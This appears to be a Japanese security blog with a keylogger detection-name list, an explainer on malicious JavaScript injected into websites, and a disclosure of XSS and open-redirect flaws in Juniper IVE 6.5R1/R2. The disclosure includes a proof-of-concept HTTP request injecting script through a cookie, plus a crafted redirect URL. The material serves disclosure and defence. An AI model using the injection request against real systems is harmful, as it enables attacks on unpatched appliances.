今年の1月に下記のキーロガー種類がはやりました。発見されたキーロガーが同じ種類ですけれども様々なウイルスメーカから名前は別々となります。キーロガーは基本的にトロイ種類のマルウェアですが、種類によります。

Win32/IRCBot.worm.variant
TR/Crypt.XDR.Gen
Backdoor/Win32.Rbot.gen
W32/Backdoor2.XVS
Win32:Delf-GIY
IRC/BackDoor.SdBot4.ONC
Trojan.Keylogger.ADY
Trojan.Delfinject.ag
Trojan.Mybot-10022
TrojWare.Win32.TrojanDropper.Delf.~DI
Trojan.DownLoader.50961
Win32.TRCrypt.Xdr
W32/Backdoor2.XVS
Trojan.Keylogger.ADY
W32/RBot.HYJ!tr.bdr
Trojan.Keylogger.ADY
Trojan.Win32.ProcessHijack
Backdoor/RBot.ibm
Backdoor.Win32.Rbot
Backdoor.Win32.Rbot.hyj
BackDoor-EFI
BackDoor-EFI
Trojan.Crypt.XDR.Gen
TrojanDropper:Win32/Agent.BAD
Win32/TrojanDropper.Delf.NJH
W32/Spybot.DOQT
W32/Gaobot.OXI.worm
Worm.Rbot.AATS-
Trojan.DL.Win32.Mnless.fhz
Troj/Spy-DW
Backdoor.Rbot
W32.Spybot.Worm
Trojan/IRCBot.gen
TROJ_DELF.SMX
Backdoor.Win32.Rbot.hyj
Worm.Rbot.AATS

---
http://0day.jp
マルウェアリサーチチーム

マルウェアJavaScriptについて（その１）

※このブログの内容はマルウェア調査内容になりシリーズで続きます、ビギナーとセキュリティ専門の一つリファレンスになるかと、続きはこちらのリンクでアクセスして下さい⇒「２」「３」「４」「５」と「追加警告」、宜しくお願いします。

最近ホームページでXSR/XSRFのセキュリティ攻撃が沢山発見されています。
攻撃されたサイトでは、アタッカーがマルウェアコードをオリジナルのhtmlファイルに追加します。マルウェアコードが追加された感染ページ(redirectorページ)にアクセスした場合、ユーザは他のマルウェア・ダウンロード・サイト(infectorページ)へリダイレクトされて、パソコンにマルウェアファイルをダウンロードされてしまいます。

htmlファイルに追加されたコードの殆どはjavascriptのコードです。どんなjavascriptを使われているのか、このブログで説明します。

マルウェアに感染されたjavascriptページは２つパターンがあります。

1. 「難読化」されたjavascript
2. hidden/「隠れた」IFRAME

htmlファイル内のjavascriptのマルウェアコードの追加場所は・・↓

＜body＞タグの直後
＜/html＞タグの直後
＜html＞タグの前

「難読化」されたjavascriptの方は直ぐに発見出来ます。例えば下記の画像です。

↑見た通り多くのesacpe-codeが使われてます。目的はマルウェア関係のメールアドレスやURL/ドメイン名を簡単に見つからない様に作られています。↑

下記のサンプルはGumblarマルウェアに感染された「リダイレクト・ページ」で、javascriptが追加されています。特別なソフトを使うと「難読化」javascriptが読み易いコードに変換できます。
調査の結果、結局、単純なコードでした。下記のコードにアクセスしてしまうと、ブラウザの情報をマルウェアサイトに渡す事で、次は様々なマルウェアを動作させることが可能になります。



このコードをマルウェア対策ソフトで検知出来るか？
マルウェアとしてのjavascriptはウイルス対策ソフトに登録出来ますが、様々な書き方が簡単にできますので、全ての書き方を対応するのは困難と思われます。

自分のホームページは感染されたかどうすればて分かりますか？
一番の方法は、マルウェアjavascriptコードを追加された場合、ファイルの(1)日付、(2)サイズ、(3)md5情報が変更されますので、オリジナルと比較すれば確実に確認が出来ます。比較する為にローカル側にもhtmlのバックアップがあれば有効です。

どんなWeb攻撃が流行っていますか？具体的にアタックしやすいサイトとは何ですか？
コンテンツ・マネジェメント・パッケージ（Drupal, Xoops, Joomla, など）とブログ・パッケージ（WordPress, MT, など）がSQL-INJECTION攻撃を受けています。また、PHP/Perlで作られたウェブ・マネジェメント・システムはXSS/XSRFで攻撃されてます。

つづく

---
0day.jp
マルウェアリサーチチーム
アドリアン・ヘンドリック＆渡部 章

Juniper Secure Access(Juniper IVE)のXSSとREDIRECTIONセキュリティ問題

Juniper Secure Accessシリーズ(Juniper Networks IVE)はJuniperセキュリティアプライアンスが使ってるウエプGUIインターフェースです。Juniper Networks IVEが使っているアプライアンスの写真は下記となります↓

問題の説明↓

XSS(クロススクリプティング)とウェブアクセスREDIRECTIONセキュリティ問題が発見されて、リモート側からxssインジェクション攻撃をされる問題起きる可能性が高いです。

下記のバージョンに影響があります↓

Juniper Networks
version 6.5R1 (Build 14599)
version 6.5R2 (Build 14951)

注意点↓

つい最近本件セキュリティ問題情報がインターネットでパブリックで交換されてます。再現仕方(PoC)迄に詳しく書いてありますがアップグレードが直ぐに必要です。

再現仕方（PoC）↓

1) 「GET cookie XSS インジェックション」の再現仕方
GET /dana/nc/ncrun.cgi?launch_nc=1 HTTP/1.1
Host: 10.0.5.23
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://10.0.5.23/dana/home/index.cgi
Cookie: DSPREAUTH=; DSFirstAccess=1255332662; DSHCSTARTED=x;
DSASSERTREF=x; DSLastAccess=1255332662; lastRealm=Users;
DSSignInURL=/e6cf2"＞＜script＞alert(1)＜/script＞81d17f3a375;
DSSIGNIN=url_default; DSOSMLOGIN=x; DSIVS=; DSCheckBrowser=x;
DSID=5beee6a236f28b2c3ccf14d56b34feba; DSLaunchURL=x;
DSBrowserProxy=127.0.0.1%3A8080;

RESULTS (PART OF)
＜PARAM NAME="AutoStart" VALUE="false"＞＜param name="locale" value="en"＞
＜param name="upgradeMode" value=""＞
＜param name="Parameter0"
value="cert_md5=8ae8f59ab11a2e6f43b383876d270799;dns-suffix=procheckup.c
om;switch-dns-search-order=disabled;internal-proxy-config=no;ncp_read_ti
meout=90;enable_logging=0;enable_logupload=0;win_start_script=;win_end_s
cript=;win_skip_start_script=0;linux_start_script=;linux_end_script=;mac
_start_script=;mac_end_script=;signin_url=/e6cf2"＞＜script>alert(1)＜/script＞81d17f3a375;fips_mode=0"＞
＜param name="Parameter1" value="split-tunneling-routes="＞
＜param name="Parameter2" value="split-tunneling-mode=1"＞
＜param name="Parameter3" value="nc_auto_uninstall_mode=0"＞

2) REDIRECTIONセキュリティ問題の再現仕方↓
https://target-domain.foo/dana/home/homepage.cgi?syncFlag=1&name=test&ur
l=555-555-0199 (at) example (dot) com [email concealed]&chkFavorite=on&chkNewWindow=on&chkAddressBar=
on&Location=http://www.procheckup.com&chkToolbar=on&cancel=Cancel

解決方法↓

IVEバーション6.5R3.1 (build 15255)以上へアップグレードが必要です。

リファレンス↓

アドバイソリーのリンクは下記となります、ご確認下さい↓
http://www.securityfocus.com/archive/1/511775
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr09-17
http://www.juniper.net/alerts/viewalert.jsp

追加情報↓

発見日: 12th October 2009
メーカに報告: 12 October 2009
メーカより正式な報告: 2010年6月10日
CVE登録：N/A
Severity: Medium (Script injection)

---
zeroday.jp(0day.jp)
セキュリティチーム